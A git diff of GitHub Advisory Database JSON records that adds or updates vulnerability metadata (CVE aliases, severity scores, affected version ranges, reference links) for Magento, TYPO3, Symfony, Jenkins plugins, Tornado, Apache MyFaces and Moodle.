b/advisories/github-reviewed/2022/05/GHSA-85xw-3hp5-6fmc/GHSA-85xw-3hp5-6fmc.json index 81f329d59d00d..a31eafae85cf4 100644 --- a/advisories/github-reviewed/2022/05/GHSA-85xw-3hp5-6fmc/GHSA-85xw-3hp5-6fmc.json +++ b/advisories/github-reviewed/2022/05/GHSA-85xw-3hp5-6fmc/GHSA-85xw-3hp5-6fmc.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8138" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8138.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-86hp-xrhj-fhpq/GHSA-86hp-xrhj-fhpq.json b/advisories/github-reviewed/2022/05/GHSA-86hp-xrhj-fhpq/GHSA-86hp-xrhj-fhpq.json index e05adce9313e4..330b1ea44d888 100644 --- a/advisories/github-reviewed/2022/05/GHSA-86hp-xrhj-fhpq/GHSA-86hp-xrhj-fhpq.json +++ b/advisories/github-reviewed/2022/05/GHSA-86hp-xrhj-fhpq/GHSA-86hp-xrhj-fhpq.json @@ -25,17 +25,14 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "8.0" + "introduced": "8.0.0" }, { "fixed": "8.7.27" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 8.7.26" - } + ] }, { "package": { @@ -47,17 +44,52 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "9.0" + "introduced": "9.0.0" }, { "fixed": "9.5.8" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.7" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.27" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.8" + } + ] + } + ] } ], "references": [ @@ -65,6 +97,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12747" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2019-12747.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2019-12747.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3-CMS/core" @@ -73,6 +113,10 @@ "type": "WEB", "url": "https://typo3.org/cms/release-news/typo3-8-release-notes/" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-020" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-020/" diff --git a/advisories/github-reviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json b/advisories/github-reviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json new file mode 100644 index 0000000000000..a613da328d51b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8864-pwhg-3mp2", + "modified": "2024-01-30T22:10:25Z", + "published": "2022-05-14T03:05:26Z", + "aliases": [ + "CVE-2018-1000607" + ], + "summary": "Arbitrary file write vulnerability in Jenkins Fortify CloudScan Plugin", + "details": "A arbitrary file write vulnerability exists in Jenkins Fortify CloudScan Plugin 1.5.1 and earlier in ArchiveUtil.java that allows attackers able to control rulepack zip file contents to overwrite any file on the Jenkins master file system, only limited by the permissions of the user the Jenkins master process is running as.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:fortify-cloudscan-jenkins-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.5.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000607" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-06-25/#SECURITY-870" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:10:25Z", + "nvd_published_at": "2018-06-26T17:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-89cp-fvcc-hxh7/GHSA-89cp-fvcc-hxh7.json b/advisories/github-reviewed/2022/05/GHSA-89cp-fvcc-hxh7/GHSA-89cp-fvcc-hxh7.json index c9670a67c9c64..662dd8d86bf12 100644 --- a/advisories/github-reviewed/2022/05/GHSA-89cp-fvcc-hxh7/GHSA-89cp-fvcc-hxh7.json +++ b/advisories/github-reviewed/2022/05/GHSA-89cp-fvcc-hxh7/GHSA-89cp-fvcc-hxh7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-89cp-fvcc-hxh7", - "modified": "2023-08-15T23:43:12Z", + "modified": "2024-02-06T16:02:10Z", "published": "2022-05-17T05:17:45Z", "aliases": [ "CVE-2012-6432" @@ -12,6 +12,15 @@ ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "versions": [ + "2.2-dev" + ] + }, { "package": { "ecosystem": "Packagist", @@ -22,7 +31,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0" + "introduced": "2.0.0" }, { "fixed": "2.0.20" @@ -41,7 +50,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.1" + "introduced": "2.1.0" }, { "fixed": "2.1.5" @@ -49,15 +58,6 @@ ] } ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "symfony/symfony" - }, - "versions": [ - "2.2-dev" - ] } ], "references": [ @@ -65,6 +65,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-6432" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2012-6432.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/symfony/symfony" + }, + { + "type": "WEB", + "url": "https://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released" + }, { "type": "WEB", "url": "http://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released" diff --git a/advisories/github-reviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json b/advisories/github-reviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json new file mode 100644 index 0000000000000..55095255cba07 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jx9-7j5m-79x4", + "modified": "2024-01-30T22:46:28Z", + "published": "2022-05-13T01:40:54Z", + "aliases": [ + "CVE-2017-1000089" + ], + "summary": "Jenkins Build Step Plugin fails to check Item/Build permission", + "details": "Builds in Jenkins are associated with an authentication that controls the permissions that the build has to interact with other elements in Jenkins. The Pipeline: Build Step Plugin did not check the build authentication it was running as and allowed triggering any other project in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:pipeline-build-step" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.5.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000089" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:46:28Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json b/advisories/github-reviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json new file mode 100644 index 0000000000000..dc7f3d87baca9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8rc4-3jc3-83pm", + "modified": "2024-01-30T22:12:10Z", + "published": "2022-05-14T03:13:12Z", + "aliases": [ + "CVE-2018-1000198" + ], + "summary": "XML External Entity processing vulnerability in Jenkins Black Duck Hub Plugin", + "details": "A XML external entity processing vulnerability exists in Jenkins Black Duck Hub Plugin 3.1.0 and older in PostBuildScanDescriptor.java that allows attackers with Overall/Read permission to make Jenkins process XML eternal entities in an XML document.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.blackducksoftware.integration:blackduck-hub" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.0.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000198" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-671" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:12:01Z", + "nvd_published_at": "2018-06-05T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json b/advisories/github-reviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json new file mode 100644 index 0000000000000..0d7d3180f1b21 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vpw-mgpf-mpvv", + "modified": "2024-02-01T20:53:42Z", + "published": "2022-05-17T19:57:19Z", + "aliases": [ + "CVE-2014-9720" + ], + "summary": "Tornado XSRF cookie allows side-channel attack against TLS (BREACH attack)", + "details": "Tornado before 3.2.2 sends arbitrary responses that contain a fixed CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "tornado" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9720" + }, + { + "type": "WEB", + "url": "https://github.com/tornadoweb/tornado/commit/1c36307463b1e8affae100bf9386948e6c1b2308" + }, + { + "type": "WEB", + "url": "https://bugzilla.novell.com/show_bug.cgi?id=930362" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222816" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tornadoweb/tornado" + }, + { + "type": "WEB", + "url": "http://openwall.com/lists/oss-security/2015/05/19/4" + }, + { + "type": "WEB", + "url": "http://www.tornadoweb.org/en/stable/releases/v3.2.2.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:53:42Z", + "nvd_published_at": "2020-01-24T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-8wgj-6wx8-h5hq/GHSA-8wgj-6wx8-h5hq.json b/advisories/github-reviewed/2022/05/GHSA-8wgj-6wx8-h5hq/GHSA-8wgj-6wx8-h5hq.json index 590c39ecbdf87..54477a96fe1a3 100644 --- a/advisories/github-reviewed/2022/05/GHSA-8wgj-6wx8-h5hq/GHSA-8wgj-6wx8-h5hq.json +++ b/advisories/github-reviewed/2022/05/GHSA-8wgj-6wx8-h5hq/GHSA-8wgj-6wx8-h5hq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8wgj-6wx8-h5hq", - "modified": "2023-02-22T16:58:31Z", + "modified": "2024-02-08T19:31:49Z", "published": "2022-05-13T01:05:42Z", "aliases": [ "CVE-2018-14773" @@ -128,6 +128,120 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.49" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.44" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.3" + } + ] + } + ] } ], "references": [ @@ -139,6 +253,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/e447e8b92148ddb3d1956b96638600ec95e08f6b" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2018-14773.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-14773.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00009.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json b/advisories/github-reviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json new file mode 100644 index 0000000000000..eb60ba5d0ccc7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-92cv-wv2c-8899", + "modified": "2024-02-08T15:50:25Z", + "published": "2022-05-17T05:50:42Z", + "aliases": [ + "CVE-2010-2086" + ], + "summary": "Apache MyFaces Cross-site Scripting vulnerability", + "details": "Apache MyFaces 1.1.7 and 1.2.8 (All previous versions are likely vulnerable), as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.myfaces.core:myfaces-core-module" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.1.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.myfaces.core:myfaces-core-module" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.2.0" + }, + { + "last_affected": "1.2.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2086" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/myfaces" + }, + { + "type": "WEB", + "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt" + }, + { + "type": "WEB", + "url": "http://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:50:25Z", + "nvd_published_at": "2010-05-27T19:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-92x6-h2gr-8gxq/GHSA-92x6-h2gr-8gxq.json b/advisories/github-reviewed/2022/05/GHSA-92x6-h2gr-8gxq/GHSA-92x6-h2gr-8gxq.json index 2b0972df26161..9a0bbc35f7b46 100644 --- a/advisories/github-reviewed/2022/05/GHSA-92x6-h2gr-8gxq/GHSA-92x6-h2gr-8gxq.json +++ b/advisories/github-reviewed/2022/05/GHSA-92x6-h2gr-8gxq/GHSA-92x6-h2gr-8gxq.json @@ -15,6 +15,158 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-csrf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-csrf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-csrf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-csrf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -32,10 +184,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.7.37" - } + ] }, { "package": { @@ -54,10 +203,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.8.30" - } + ] }, { "package": { @@ -69,17 +215,14 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.2.0" + "introduced": "3.0.0" }, { "fixed": "3.2.14" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.2.13" - } + ] }, { "package": { @@ -98,10 +241,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.3.12" - } + ] } ], "references": [ @@ -117,6 +257,18 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/b4dbdd7cd8732483d585eacff3428c16b07ad15e" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-csrf/CVE-2017-16653.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2017-16653.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2017-16653.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -125,6 +277,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2017-16653-csrf-protection-does-not-use-different-tokens-for-http-and-https" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2017-16653" + }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4262" diff --git a/advisories/github-reviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json b/advisories/github-reviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json new file mode 100644 index 0000000000000..336c16f68b731 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json @@ -0,0 +1,109 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-966m-m549-2878", + "modified": "2024-02-07T22:35:03Z", + "published": "2022-05-13T01:13:08Z", + "aliases": [ + "CVE-2010-1616" + ], + "summary": "Moodle is vulnerable to unauthorized new accounts creation", + "details": "Moodle 1.8.x and 1.9.x before 1.9.8 can create new roles when restoring a course, which allows teachers to create new accounts even if they do not have the moodle/user:create capability.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.8.0" + }, + { + "fixed": "1.8.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.9.0" + }, + { + "fixed": "1.9.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1616" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/55f5b2e8b84e6390c0917195d01a3b34c33ff398" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/5d9ab024ac9c311c84716628cce9a124173a2e8b" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/5e934890c9fbe28bf89362d3eb6140208b5e3464" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/b0ccfc5ce87f09d4df814b057f5e6820d37fdad1" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/d8ada21339ecc147eccaaae97678f5368ac05f8b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moodle/moodle" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html" + }, + { + "type": "WEB", + "url": "http://moodle.org/security/" + }, + { + "type": "WEB", + "url": "http://tracker.moodle.org/browse/MDL-16658" + }, + { + "type": "WEB", + "url": "http://www.vupen.com/english/advisories/2010/1107" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:35:03Z", + "nvd_published_at": "2010-04-29T21:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-985w-mqqp-7287/GHSA-985w-mqqp-7287.json b/advisories/github-reviewed/2022/05/GHSA-985w-mqqp-7287/GHSA-985w-mqqp-7287.json index bd91e8b81b5f5..c593acc627415 100644 --- a/advisories/github-reviewed/2022/05/GHSA-985w-mqqp-7287/GHSA-985w-mqqp-7287.json +++ b/advisories/github-reviewed/2022/05/GHSA-985w-mqqp-7287/GHSA-985w-mqqp-7287.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8120" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8120.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json b/advisories/github-reviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json new file mode 100644 index 0000000000000..e85db698f8270 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c2p-99pg-c4j9", + "modified": "2024-01-30T22:35:50Z", + "published": "2022-05-17T00:29:01Z", + "aliases": [ + "CVE-2017-1000102" + ], + "summary": "Persistent XSS vulnerability in Static Analysis Utilities", + "details": "The Details view of some Static Analysis Utilities based plugins, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to these plugins, for example the console output which is parsed to extract build warnings (Warnings Plugin), could insert arbitrary HTML into this view.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:analysis-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.92" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.91" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000102" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/101061" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:35:50Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json b/advisories/github-reviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json new file mode 100644 index 0000000000000..b841fa46b0e08 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9hh2-8cw6-hfv7/GHSA-9hh2-8cw6-hfv7.json @@ -0,0 +1,136 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hh2-8cw6-hfv7", + "modified": "2024-02-07T23:35:28Z", + "published": "2022-05-17T01:55:58Z", + "aliases": [ + "CVE-2010-5100" + ], + "summary": "TYPO3 Cross-Site Scripting vulnerability in the Install Tool ", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Install Tool in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5100" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/9bb2fe60d8938048c9049e2d660c0ae8409b21d4" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/cf974942d1738b6b38c506a30a808c5e405d3ca2" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/e892f0a17f40d703fd71ee66490dee15b132909c" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64181" + }, 